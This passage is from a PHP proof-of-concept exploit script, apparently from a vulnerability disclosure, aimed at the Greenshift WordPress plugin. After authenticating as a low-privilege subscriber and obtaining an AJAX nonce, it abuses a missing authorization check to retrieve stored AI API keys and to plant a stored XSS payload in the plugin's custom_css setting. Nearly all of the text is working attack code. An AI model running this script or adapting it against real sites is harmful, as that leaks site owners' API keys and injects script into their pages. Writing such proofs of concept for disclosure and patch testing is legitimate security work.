    preg_match('/"_nonce":"([^"]*)"/', $response, $matches);
    return $matches[1] ?? '';
}

// Step 3: Exploit missing authorization to retrieve AI API keys
function exploit_get_settings($url, $nonce) {
    $ajax_url = $url . '/wp-admin/admin-ajax.php';
    
    $ch = curl_init($ajax_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'action' => 'greenshift_app_pass_validation',
        '_ajax_nonce' => $nonce,
        'operation' => 'get',
        'setting_type' => 'global',
        'key' => 'ai_api_keys'
    ]));
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "[+] Retrieving AI API keys...n";
    echo "HTTP Code: $http_coden";
    echo "Response: $responsenn";
    
    return $response;
}

// Step 4: Exploit stored XSS via custom_css parameter
function exploit_stored_xss($url, $nonce) {
    $ajax_url = $url . '/wp-admin/admin-ajax.php';
    $xss_payload = '</style><script>alert("Atomic Edge XSS");</script><style>';
    
    $ch = curl_init($ajax_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'action' => 'greenshift_app_pass_validation',
        '_ajax_nonce' => $nonce,
        'operation' => 'set',
        'setting_type' => 'global',
        'key' => 'custom_css',
        'value' => $xss_payload
    ]));
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "[+] Injecting stored XSS payload...n";
    echo "HTTP Code: $http_coden";
    echo "Response: $responsen";
    
    return $response;
}

// Main execution
if (wp_login($target_url, $username, $password)) {
    echo "[+] Successfully authenticated as subscribern";
    
    $nonce = get_ajax_nonce($target_url);
    if ($nonce) {
        echo "[+] Obtained AJAX nonce: $noncenn";
        
        // Demonstrate information disclosure
        exploit_get_settings($target_url, $nonce);
        
        // Demonstrate stored XSS
        exploit_stored_xss($target_url, $nonce);
        
        echo "n[+] Exploitation completed. Check plugin settings for injected XSS.n";
    } else {
        echo "[-] Failed to obtain AJAX noncen";
    }
} else {
    echo "[-] Authentication failedn";
}

// Cleanup
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>